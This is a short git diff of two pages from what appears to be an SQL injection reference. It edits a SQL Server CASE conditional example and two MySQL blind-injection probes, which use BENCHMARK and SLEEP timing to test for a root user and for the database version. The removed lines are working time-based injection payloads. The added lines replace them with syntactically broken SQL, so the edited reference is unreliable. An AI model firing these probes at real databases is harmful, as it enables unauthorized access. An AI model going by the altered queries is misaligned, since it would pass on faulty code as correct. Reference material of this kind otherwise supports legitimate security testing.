diff --git a/injectionTechniques/conditionalStatements/sqlserver.html b/injectionTechniques/conditionalStatements/sqlserver.html index 5c978c5..95481ed 100644 --- a/injectionTechniques/conditionalStatements/sqlserver.html +++ b/injectionTechniques/conditionalStatements/sqlserver.html @@ -12,7 +12,7 @@

Conditionals

Case - SELECT CASE WHEN 1=1 THEN 1 ELSE 0 END + SELECT * FROM CASE WHEN 1=1 THEN 1 ELSE 0 END If/Else diff --git a/injectionTypes/blindBased/mysql.html b/injectionTypes/blindBased/mysql.html index 874da01..3bd5d9c 100644 --- a/injectionTypes/blindBased/mysql.html +++ b/injectionTypes/blindBased/mysql.html @@ -64,11 +64,11 @@

Full-Blind

User is root (Benchmark method) - SELECT IF(user() LIKE 'root@%', BENCHMARK(5000000, ENCODE('Slow Down','by 5 seconds')), null) + SELECT * from (user() LIKE 'root@%', BENCHMARK(5000000, ENCODE('Slow Down','by 5 seconds')), null) Version is 5.x.x - SELECT IF(SUBSTRING(version(),1,1)=5,SLEEP(5),null) + SELECT * from (SUBSTRING(version(),1,1)=5,SLEEP(5),null)